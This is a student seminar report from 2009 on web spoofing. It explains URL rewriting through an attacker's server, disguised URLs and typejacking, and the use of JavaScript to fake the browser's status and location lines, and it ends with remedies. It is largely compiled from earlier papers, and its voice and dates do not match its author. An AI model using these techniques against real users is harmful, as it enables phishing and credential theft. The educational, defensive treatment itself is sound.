Sie sind auf Seite 1von 21

SEMINAR REPORT

ON

WEB SPOOFING

Submitted in

Partial Fulfillment of the Requirements for the

Degree of

Bachelor Engineering

IN

COMPUTER SCIENCE & ENGINEERING

Session: 2008-09

Submitted To:
Submitted By:

Miss. Shubhra Saxena


Varun Kumar

(Lecturer ,Computer Science)


VIIIth Sem

(C.S.E)

DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING

Yagyavalkya Institute of Technology,


Sitapura, Jaipur

25th March, 2009

ACKNOWLEDGEMENTS

I express my sincere thanks to Mr.Kailash Maheshwari (Head of the


Department, Computer Science and Engineering, YIT), Mr. Lokesh Sharma and Miss.
Shubhra Saxena for their kind co-operation for presenting the seminar.

I also extend my sincere thanks to all other faculty members of Computer Science
and Engineering Department and for their co-operation and encouragement.

Varun Kumar
CERTIFICATE

This is certifiy that Mr. Varun Kumar from COMPUTER SCIENCE AND ENGINEERING
has successfully delivered a seminar on the topic ” Web Spoofing ” and has
submitted a satisfactory report about it as per partial fulfillment of the requirement
for the degree of B.E. (Comp.Sc.) according to the syallbus of UNIVERSITY OF
RAJASTHAN , JAIPUR during the academic year 2008-09.

Date:25th March 09

Mr.Kailash Maheshwari Miss.


Shubhra Saxena

( H.O.D ,C.S.E & I.T ) ( Seminar


Guide )
Preface

The Web is currently the pre-eminent medium for electronic service delivery to remote
users. As a consequence,
authentication of servers is more important than ever. Even sophisticated users base their
decision whether or not to trust a site on browser cues—such as location bar information, SSL
icons, SSL warnings, certificate information,
response time, etc.
In the seminal work on web spoofing, Felten et al showed how a malicious server could
forge some of these cues—but using approaches that are no longer reproducible. However,
subsequent evolution of Web tools has not only patched security holes—it has also added new
technology to make pages more interactive and vivid. In this paper, we explore the feasibility of
web spoofing using this new technology—and we show how, in many cases, every one of the
above cues can be forged.
CONTENTS

1. Acknowledgement 2

2. Preface 3

3. Certificate 4

4. Contents 5

5. Introduction 6

6. Spoofing attack 10

7. How the attack works 13

8. Background 17

1.Anatomy of Browser Window


2.Web Spoofing
9. Previous work 21
1.Princeton
2.UCSB
3.CMU
10. Consequences 22
1.Surveillance
2.Tampering
3.Spoofing the Whole Web
11. Remedies 23
Short-term & Long-term Solution
12. Limitations 24
13. Conclusion 25
14. Reference and Bibliography 26
Introduction

Nearly every aspect of social, government, and commercial activity is moving into electronic
settings. TheWorldWideWeb is the de facto standard medium for these services. Inherent
properties of the physical world make it sufficiently difficult to forge a convincing storefront or
ATM that successful attacks create long-cited anecdotes . As a consequence, users of physical
services—stores, banks, newspapers—have developed a reasonably effective intuition of when to
trust that a particular service offering is exactly what it appears to be. However, moving from
“bricks and mortar” to electronic introduces a fundamental new problem: bits are malleable.
Does this intuition still suffice for
the new electronic world? When one clicks on a link that says “Click Here to go to
TrustedStore.Com,” how does one know that’s where one has been taken?
Answering these questions require examining how users make judgments about whether
to trust a particularWeb page
for a particular service. Indeed, the issue of user trust judgment is largely overlooked; research
addressing how to secure Web servers, how to secure the client-server connection, and how to
secure client-side management risk being rendered moot, if the final transmission of trust
information the human user is neglected.
Users now routinely encounter Web (and Web-like) content as the alleged manifestation
of some specific entity—a newspaper, a store, a government agency. How do users evaluate
whether or not this manifestation is genuine? We briefly discuss some items that have re-surfaced
recently.

_ Convincing HTML.
Once upon a time, e-mail consisted solely of text. However, mail tools have become sufficiently
powerful that HTML attached to an email will be automatically rendered at the receiver’s site. A
malicious party can forge a news article by downloading legitimate HTML from a Web server,
editing it, and
attaching it to email.
One might expect that recipients should know that Web pages should be viewed via Web
transfers, not via email. However, law enforcement colleagues of ours report that this technique
is sufficiently convincing to be a continuing source of problems.

_ Convincing URL.
More sophisticated users may base their decisions on the URL their browser tells them they are
visiting. However, RFC 1738 permits more flexibility than many people realize. For a basic
example, the hostname can be an IP address.
As a case in point, in 1999, Gary D. Hoke created HTML that produced a realistic-looking
Bloomberg press release pertaining to PairGain Technologies, Inc., posted this on angelfire.com,
and posted a link to this page on a stock discussion bboard. Since the presence of angelfire.com
instead of bloomberg.com in the URL might give away the hoax, Hoke disguised the link using
by using Angelfire’s IP address instead:
http://204.238.155.37/biz2/headlines/topfin.html
Hoke’s limited disguise was sufficient to drive the price of the stock up by a third (and also land
him in legal
trouble). However, the technology permits even more convincing disguises. For one thing, on
many platforms
(including all the Netscape installations we tested, except Macs), the IP address can be expressed
as a decimal number (e.g., 3438189349) instead of the more familar slot-dot notation—further
disguising things.
Furthermore, (as pointed out yet again in) RFC 1738 permits the hostname portion to include a
username and password in addition to machine name. Hoke could have made his hoax even more
convincing by finding (or setting up) a server that accepts arbitrary user names and passwords,
and giving a URL of the form
http://bloomberg.com:biz@3438189349/headlines/topfin.html

_ Typejacking.
URLs that appear more standard—but contain incorrect hostnames deceptively similar to
hostnames users expect—is a trick long-used by many e-commerce vendors (primarily
pornographers) to lure in unwitting customers.
However, this technique can also be used maliciously. As we recently saw in the headlines,
attackers established a clone of the paypal Web site at a hostname paypai, and used email to lure
unsuspecting users to log in—and reveal their PayPal passwords. The fact that many mailers let a
user simply click on a link, instead of pasting or typing it into a browser, and that in many fonts,
a lower-case “i” is indistinguishable from
a lower-case “l”, facilitated this attack.

_ SSL to whom?
Secure Sockets Layer (SSL) is touted as the solution to secure Web connections and server
impostors. However, even if a user can figure out how to examine the certificate testifying to a
server’s identity, it is not clear whether this information provides sufficient grounds for trust. For
example, the Palm Computing
“secure” web site is protected by an SSL certificate registered to Modus Media. Is Modus Media
authorized to act for Palm Computing? (It turns out, yes. But how is the user to know?)
It is against this background that we started our work. The current visual signals that a browser
provides do not appear
to provide enough information for many trust judgments the user needs to make. But before we
examine how to extend the browser user interface to handle things like security attribute
certificates or delegation for servers, we need to examine whether the insufficient information
the browsers do provide is reliable. The seminal web spoofing work of Felten et al showed that,
in 1996, a malicious site could forge many of these clues. Subsequent researchers reported
difficulty reproducing these results. This scenario raises the question: What’s still spoofable
today, in 2001?
Our answer: for standard browser installations, just about everything: including the existence of
SSL sessions and the
alleged certificates supporting them.
To return to our earlier question: how does one know the click has really taken one to
TrustedStore.com? One cannot.
On common Netscape and Internet Explorer platforms, if one surfs with JavaScript enabled, an
adversary site can
convincingly spoof the clues and appropriate behavior.
Section 2 establishes the background: the elements of Web pages, Web surfing, and advanced
content tools. Section 3
discusses previous efforts in this area. Section 4 presents the sequence of techniques that we
developed. Section 5
sketches some interesting extensions of these techniques. Section 6 concludes with some avenues
for future work.

Spoofing Attacks
In a spoofing attack, the attacker creates misleading context in order to trick the victim
into making an inappropriate security-relevant decision. A spoofing attack is like a con game: the
attacker sets up a false but convincing world around the victim. The victim does something that
would be appropriate if the false world were real. Unfortunately, activities that seem reasonable
in the false world may have disastrous effects in the real world.
Spoofing attacks are possible in the physical world as well as the electronic one. For
example, there have been several incidents in which criminals set up bogus automated-teller
machines1, typically in the public areas of shopping malls. The machines would accept ATM
cards and ask the person to enter their PIN code. Once the machine had the victim’s PIN, it could
either eat the card or “malfunction” and return the card. In either case, the criminals had enough
information to copy the victim’s card and use the duplicate. In these attacks, people were fooled
by the context they saw: the location of the machines, their size and weight, the way they were
decorated, and the appearance of their electronic displays. People using computer systems often
make security-relevant decisions based on contextual cues they see. For example, you might
decide to type in your bank account number because you believe you are visiting your bank’s
Web page. This belief might arise because the page has a familiar look, because the bank’s URL
appears in the browser’s location line, or for some other reason. To appreciate the range and
severity of possible spoofing attacks, we must look more deeply into two parts of the definition
of spoofing: security-relevant decisions and context.

Security-relevant Decisions
By “security-relevant decision,” we mean any decision a person makes that might lead to
undesirable results such as a breach of privacy or unauthorized tampering with data. Deciding to
divulge sensitive information, for example by typing in a password or account number, is one
example of a security-relevant decision. Choosing to accept a downloaded document is a
security-relevant decision, since in many cases a downloaded document is capable of containing
malicious elements that harm the person receiving the document2. Even the decision to accept
the accuracy of information displayed by your computer can be security-relevant. For example, if
you decide to buy a stock based on information you get from an online stock ticker, you are
trusting that the information provided by the ticker is correct. If somebody could present you
with incorrect stock prices, they might cause you to
engage in a transaction that you would not have otherwise made, and this could cost you money.

Context
A browser presents many types of context that users might rely on to make decisions. The
text and pictures on a Web page might give some impression about where the page came from;
for example, the presence of a corporate logo implies that the page originated at a certain
corporation.
The appearance of an object might convey a certain impression; for example, neon green text on
a purple background probably came from Wired magazine. You might think you’re dealing with
a popup window when what you are seeing is really just a rectangle with a border and a color
different from the surrounding parts of the screen. Particular graphical items like file-open dialog
boxes are immediately recognized as having a certain purpose. Experienced Web users react to
such cues in the same way that experienced drivers react to stop signs without reading them. The
names of objects can convey context. People often deduce what is in a file by its name.
Is manual.doc the text of a user manual? (It might be another kind of document, or it might not
be a document at all.) URLs are another example. Is MICR0S0FT.COM the address of a large
software company? (For a while that address pointed to someone else entirely. By the way, the
round symbols in MICR0S0FT here are the number zero, not the letter O.) Was dole96.org Bob
Dole’s 1996 presidential campaign? (It was not; it pointed to a parody site.)
People often get context from the timing of events. If two things happen at the same time,
you naturally think they are related. If you click over to your bank’s page and a
username/password dialog box appears, you naturally assume that you should type the name and
password that you use for the bank. If you click on a link and a document immediately starts
downloading, you assume that the document came from the site whose link you clicked on.
Either assumption could be wrong.
If you only see one browser window when an event occurs, you might not realize that the event
was caused by another window hiding behind the visible one.
Modern user-interface designers spend their time trying to devise contextual cues that will guide
people to behave appropriately, even if they do not explicitly notice the cues. While this is
usually beneficial, it can become dangerous when people are accustomed to relying on context
that is not always correct.

TCP and DNS Spoofing


Another class of spoofing attack, which we will not discuss here, tricks the user’s
software into an inappropriate action by presenting misleading information to that software3.
Examples of such attacks include TCP spoofing4, in which Internet packets are sent with forged
return addresses, and DNS spoofing5, in which the attacker forges information about which
machine names correspond to which network addresses. These other spoofing attacks are well
known, so we will not discuss them further.

Web Spoofing
Web spoofing is a kind of electronic con game in which the attacker creates a convincing
but false copy of the entire World Wide Web. The false Web looks just like the real one: it has all
the same pages and links. However, the attacker controls the false Web, so that all network traffic
between the victim’s browser and the Web goes through the attacker.
How the Attack Works
The key to this attack is for the attacker’s Web server to sit between the victim and the
rest of the Web. This kind of arrangement is called a “man in the middle attack” in the security
literature.

URL Rewriting
The attacker’s first trick is to rewrite all of the URLs on some Web page so that they
point to the attacker’s server rather than to some real server. Assuming the attacker’s server is on
the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org to
the front of the URL. For example,
http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com. (The
URL rewriting technique has been used for other reasons by several other Web sites, including
the
Anonymizer and the Zippy filter. See page 9 for details.) Figure 1 shows what happens when the
victim requests a page through one of the rewritten URLs. The victim’s browser requests the
page from www.attacker.org, since the URL starts with http://www.attacker.org. The remainder
of the URL tells the attacker’s server where on the Web to go to get the real document.
Figure 1: An example Web transaction during a Web spoofing attack. The victim requests
a Web page. The following steps occur: (1) the victim’s browser requests the page from
the attacker’s server; (2) the attacker’s server requests the page from the real server; (3) the
real server provides the page to the attacker’s server; (4) the attacker’s server rewrites the
page; (5) the attacker’s server provides the rewritten version to the victim.

Once the attacker’s server has fetched the real document needed to satisfy the request, the
attacker rewrites all of the URLs in the document into the same special form by splicing
http://www.attacker.org/ onto the front. Then the attacker’s server provides the rewritten page to
the victim’s browser.
Since all of the URLs in the rewritten page now point to www.attacker.org, if the
victim follows a link on the new page, the page will again be fetched through the attacker’s
server. The victim remains trapped in the attacker’s false Web, and can follow links forever
without leaving it.

Forms
If the victim fills out a form on a page in a false Web, the result appears to be handled properly.
Spoofing of forms works naturally because forms are integrated closely into the basic Web
protocols: form submissions are encoded in Web requests and the replies are ordinary HTML.
Since any URL can be spoofed, forms can also be spoofed.
When the victim submits a form, the submitted data goes to the attacker’s server. The attacker’s
server can observe and even modify the submitted data, doing whatever malicious editing
desired, before passing it on to the real server. The attacker’s server can also modify the data
returned in response to the form submission.
“Secure” connections don’t help
One distressing property of this attack is that it works even when the victim requests a
page via a “secure” connection. If the victim does a “secure” Web access ( a Web access using
the Secure Sockets Layer) in a false Web, everything will appear normal: the page will be
delivered, and the secure connection indicator (usually an image of a lock or key) will be turned
on. The victim’s browser says it has a secure connection because it does have one. Unfortunately
the secure connection is to www.attacker.org and not to the place the victim thinks it is.
The victim’s browser thinks everything is fine: it was told to access a URL at
www.attacker.org so it made a secure connection to www.attacker.org. The
secure-connection indicator only gives the victim a false sense of security.

Starting the Attack


To start an attack, the attacker must somehow lure the victim into the attacker’s false
Web. There are several ways to do this. An attacker could put a link to a false Web onto a popular
Web page. If the victim is using Web-enabled email, the attacker could email the victim a pointer
to a false Web, or even the contents of a page in a false Web. Finally, the attacker could trick a
Web search engine into indexing part of a false Web.

Completing the Illusion


The attack as described thus far is fairly effective, but it is not perfect. There is still some
remaining context that can give the victim clues that the attack is going on. However, it is
possible for the attacker to eliminate virtually all of the remaining clues of the attack’s existence.
Such evidence is not too hard to eliminate because browsers are very customizable. The ability
of a Web page to control browser behavior is often desirable, but when the page is hostile it can
be dangerous.

The Status Line


The status line is a single line of text at the bottom of the browser window that displays
various messages, typically about the status of pending Web transfers.
The attack as described so far leaves two kinds of evidence on the status line. First, when the
mouse is held over a Web link, the status line displays the URL the link points to. Thus, the
victim might notice that a URL has been rewritten. Second, when a page is being fetched, the
status line briefly displays the name of the server being contacted. Thus, the victim might notice
that www.attacker.org is displayed when some other name was expected. The attacker can cover
up both of these cues by adding a JavaScript program to every rewritten page. Since JavaScript
programs can write to the status line, and since it is possible to bind JavaScript actions to the
relevant events, the attacker can arrange things so that the status line participates in the con
game, always showing the victim what would have been on the status line in the real Web. This
makes the spoofed context even more convincing.

The Location Line


The browser’s location line displays the URL of the page currently being shown. The
victim can also type a URL into the location line, sending the browser to that URL. The attack as
described so far causes a rewritten URL to appear in the location line, giving the victim a
possible indication that an attack is in progress.
This clue can be hidden using JavaScript. A JavaScript program can hide the real location line
and replace it by a fake location line that looks right and is in the expected place. The fake
location line can show the URL the victim expects to see. The fake location line can also accept
keyboard input, allowing the victim to type in URLs normally. The JavaScript program can
rewrite typed-in URLs before they are accessed.

Viewing the Document Source


Popular browsers offer a menu item that allows the user to examine the HTML source for
the currently displayed page. A user could possibly look for rewritten URLs in the HTML source,
and could therefore spot the attack.
The attack can prevent this by using JavaScript to hide the browser’s menu bar, replacing it with
a menu bar that looks just like the original. If the user chose “view document source” from the
spoofed menu bar, the attacker would open a new window to display the original (non-rewritten)
HTML source.

Viewing Document Information


A related clue is available if the victim chooses the browser’s “view document
information” menu item. This will display information including the document’s URL. As above,
this clue can be spoofed by replacing the browser’s menu bar. This leaves no remaining visible
clues to give away the attack.

Background
Nearly all Internet users are familiar with the look and feel of Web pages and Web
surfing. In this section, we quickly introduce the elements and the underlying technology, to
establish a common terminology for the rest of the paper.

1 Anatomy of Browser Window


We start by quickly reviewing the elements of a browser window, using Netscape’s
“Classic” format. (See Figure 1.) The top line—with “File, Edit...” tags—is the menu bar. The
next line—with “Back, Forward...” buttons— is the tool bar. Below the tool bar is the location
bar, containing additional buttons as well as the location line, which displays the currently
visited URL. Below the location bar is the personal bar. The main window is next; at the bottom,
the status bar contains the SSL icon—which indicates whether or not an SSL session is
established—as well as the status line, which indicates various status information, such as the
URL associated with the hyperlink underneath the cursor. An input field is the portion of a Web
page that collects input from users.

Interaction
In a normal browser window, many of these elements are not static. Rather, user
operations—such as moving a mouse over or clicking on an element—cause some corresponding
reaction, such as displaying a pop-up menu. Typing into the location line and hitting return
causes the browser to load that page.

Surfing
In the typical act of browsing, the user selects (via clicking a link, or typing a URL) a
Web site; that server returns an HTML file which the browser renders. Potentially, the file causes
the browser to fetch and load other files from that server and other servers.
In a typical SSL session, the browser and server encrypt transmissions using shared session keys.
The existence of an SSL session is indicated by the SSL icon; depending on configuration and
platform, entering and exiting an SSL session (as well, potentially, other relevant SSL events)
triggers the display of a warning window, usually with an
“OK” or “OK, Cancel, Help” buttons.

2 Web Spoofing
For this paper, we offer this working definition of web spoofing: when malicious action
causes the reality of the browsing session to differ significantly from the mental model a
sophisticated user has of that session. In our work, we confine this malicious action to content
from a conspiracy of servers: e.g., the server that offers the fake “click here for
TrustedStore.Com” link, and the server that offers the faked pages. In particular, we do not
permit

Figure 1 Elements of a typical browser window.


the adversarial servers to have signed scripts, and we will regard the the user’s browser and
computing platform to be out of the reach of an adversary. (Although, when one thinks of the
many non-Netscape and non-Adobe sites that say “click here for the latest version of Netscape”
or “click here to get Acrobat,” Web spoofing could enable some very interesting platform
attacks.) In a typical Web spoofing attack, the attacker presents the client carefully designed web
pages, and tricks the client to believe that he is communicating with a real server instead. Web
spoofing is possible because the information which the server provides to the user is collected
and displayed by the browser. Even in SSL sessions, the user judges whether a connection is
secure based on information like the SSL icon, warning windows, location information, and
certificates. But the user does not receive this information directly; rather, he draws conclusions
from what the browser appears to tell him.

Advanced Content Tools


The key to Web spoofing is the fact that simple “hypertext markup” (the “HT” of
“HTML”) has never been good enough. Web developers have continually wanted more
interaction and flash than simple hypertext markup provides, and have developed a sequence of
ways to embed executable content inWeb pages.
Currently, the primary parameters here are:
_ the language of the executable,
_ and the location where it runs.

For languages, Java and JavaScript are two that are commmonly used. For location, the
primary choice is at the client, or at the server. Examples of server-side executables—acting
under the requests coming from the client side (but not necessarily from the user) are servlets and
CGI scripts. For client-side execution, Dynamic HTML (DHTML) has come to be the widely-
accepted catch-all term for using HTML, Cascading Style Sheets (CSS), JavaScript, and other
techniques to create vivid, interactive pages that depend primarily on client-side execution.
It is true that the emergence of executable Web content coincided with an increased focus on
security—since, without further countermeasures, the act of browsing could cause an unwitting
client to download and execute malicious code. However, this security work has been concerned
with how to prevent malicious code from stealing sensitive information from the local disk or
other web pages the client browses, and from tampering with the data that client has or shares
with other servers. (For example, both Java applet and JavaScript by default have almost no
access to local files.) Ironically, this security focus is completely inappropriate for Web spoofing:
where the goal of the content is not to illegally modify client-side data, but rather to mislead the
client, so that he/she gives the sensitive data out by mistake. Too often, traditional security
models do not include user trust judgment!

Previous Works

1.Princeton As early as 1996, Felten et al at Princeton originated the term web spoofing
and explored spoofing attacks on Netscape Navigator and Microsoft Internet Explorer that
allowed an attacker to create a “shadow copy” of the true web. When the victim accesses the
shadow Web through the attacker’s servers, the attacker can monitor all of the victim’s activities
and get or modify the information the victim enters, including passwords or credit card numbers.
Source code is not available; according to the paper, the attack used JavaScript to rewrite
the hyperlink information shown on the status bar; to hide the real location bar and replace it
with a fake one that also accept keyboard input, allowing the victim to type in URLs normally
(which then get rewritten to go the attacker’s machine); and to replace the Document Source
button the menu bar (to show the source the victim expects, not the real source). Apparently
unable to spoof the SSL icon, the Princeton attack spoofed SSL by having the user open a real
SSL session to the attacker’s machine.

2.UCSB
Subsequently, De Paoli et al at UCSB [4] tried to repeat the Princeton attack, but could no
longer fake the location bar of Netscape Navigator using JavaScript. However, De Paoli did
show how the features in Java and JavaScript can be used to launch two kinds of attacks in
standard browsers. One attack is using a Java applet to collect and send information back to its
server. A client downloads a honey-pot HTML document that embeds a spy applet with its stop
method overridden (although this enabling technique has since been deprecated). From then on,
every time the client launches a new web page with an embedded Java applet, a new Java thread
starts. But since the stop method of the spy applet is overridden, the spy thread continues running
—and collects information on the new client-side Java threads, and sends them back to the
attacker. The other attack uses a Java applet to detect when the victim visits a certain website,
then displays an impostor page for that site in order to steal sensitive information, such as credit
card number.

3.CMU
In 1996, Tygar and Whitten from CMU [20] demonstrated how a Java applet or similar
remote execution can be used as a trojan horse. The Java applet could be inserted into a client
machine through a bogus remote page and pop up a dialog window similar to the true login
windows. With the active textfield on the top of the image, the trojan horse applet would capture
the keyboard input and transfer them to attacker’s machine. Tygar and Whitten also gave a way
to prevent these attack: window personalization. None of these papers investigated how to forge
SSL connections, when no SSL connection exists.

CONSEQUENSES
Since the attacker can observe or modify any data going from the victim to Web servers,
as well as controlling all return traffic from Web servers to the victim, the attacker has many
possibilities. These include surveillance and tampering.

-Surveillance
The attacker can passively watch the traffic, recording which pages the victim visits and
the contents of those pages. When the victim fills out a form, the entered data is transmitted to a
Web server, so the attacker can record that too, along with the response sent back by the server.
Since most on-line commerce is done via forms, this means the attacker can observe any account
numbers or passwords the victim enters. As we will see below, the attacker can carry out
surveillance even if the victim has a “secure” connection (usually via Secure Sockets Layer) to
the server, that is, even if the victim’s browser shows the secure-connection icon (usually an
image of a lock or a key).

-Tampering
The attacker is also free to modify any of the data traveling in either direction between
the victim and the Web. The attacker can modify form data submitted by the victim. For
example, if the victim is ordering a product on-line, the attacker can change the product number,
the quantity, or the ship-to address.
The attacker can also modify the data returned by a Web server, for example by inserting
misleading or offensive material in order to trick the victim or to cause antagonism between the
victim and the server.

Spoofing the Whole Web


You may think it is difficult for the attacker to spoof the entire World Wide Web, but it is
not. The attacker need not store the entire contents of the Web. The whole Web is available on-
line; the attacker’s server can just fetch a page from the real Web when it needs to provide a copy
of the page on the false Web.

Remedies
Web spoofing is a dangerous and nearly undetectable security attack that can be carried
out on today’s Internet. Fortunately there are some protective measures you can take.

Short-term Solution
In the short run, the best defense is to follow a three-part strategy:
1. disable JavaScript in your browser so the attacker will be unable to hide the evidence of the
attack;
2. make sure your browser’s location line is always visible;
3. pay attention to the URLs displayed on your browser’s location line, making sure they always
point to the server you think you’re connected to.
This strategy will significantly lower the risk of attack, though you could still be
victimized if you are not conscientious about watching the location line.
At present, JavaScript, ActiveX, and Java all tend to facilitate spoofing and other security
attacks, so we recommend that you disable them. Doing so will cause you to lose some useful
functionality, but you can recoup much of this loss by selectively turning on these features when
you visit a trusted site that requires them.

Long-term Solution
We do not know of a fully satisfactory long-term solution to this problem.
Changing browsers so they always display the location line would help, although users would
still have to be vigilant and know how to recognize rewritten URLs. This is an example of a
“trusted path” technique, in the sense that the browser is able to display information for the user
without possible interference by untrusted parties. For pages that are not fetched via a secure
connection, there is not much more that can be done. For pages fetched via a secure connection,
an improved secure-connection indicator could help. Rather than simply indicating a secure
connection, browsers should clearly say who is at the other end of the connection. This
information should be displayed in plain language, in a manner intelligible to novice users; it
should say something like “Microsoft Inc.” Rather than “www.microsoft.com.” Every approach
to this problem seems to rely on the vigilance of Web users. Whether we can realistically expect
everyone to be vigilant all of the time is debatable

Limitations

1. The scenario: i was unable to present the complete scenario of web spoofing as per the
practical field is concerned. This may also include the lack of knowledge in programming
language like java for the better understanding of code level spoofing and again to work
against Advance tools like antiviruses and antispywares.

2. Fake Interaction: unable to examine the fake encounter.

3. Availability of books also bounded my approach.


Conclusions

In 2001, the original Princeton attacks may not be directly reproducible; but inspired by
them, we have shown even more extensive spoofing is now possible. Research in computer
science, perhaps more than other fields, requires saying things in the language of each
component of one’s audience. One component is only convinced by seeing real code work. As
Tygar and Whitten point out, customization is an effective way to prevent web spoofing.
Although unsigned JavaScript can detect the platform and browser the client is using, it cannot
(yet) detect the detailed window setting which may affect the browser display.

Since the initial motivation was not to attack but to defend: to “build a better browser”
that, for example, could clearly indicate security attributes of a server (and so enable clients to
securely use our server-hardening techniques. We hope to use our understanding of spoofing is to
build something that might be unspoofable.
References

[1] E. W. Felten, D. Balfanz, D. Dean and D. Wallach. Web Spoofing: An Internet Con Game.
Technical Report 54-96 (revised). Deptarmtent of Computer Science, Princeton University.
February 1997.

[2] R. J. Barbalace. “Making something look hacked when it isn’t.” The Risks Digest, 21.16,
December 2000.

[3] Dynamic HTML Lab. http://www.webreference.com/dhtml/.

[4] Carl Ellison. Personal communication, September 2000.

Das könnte Ihnen auch gefallen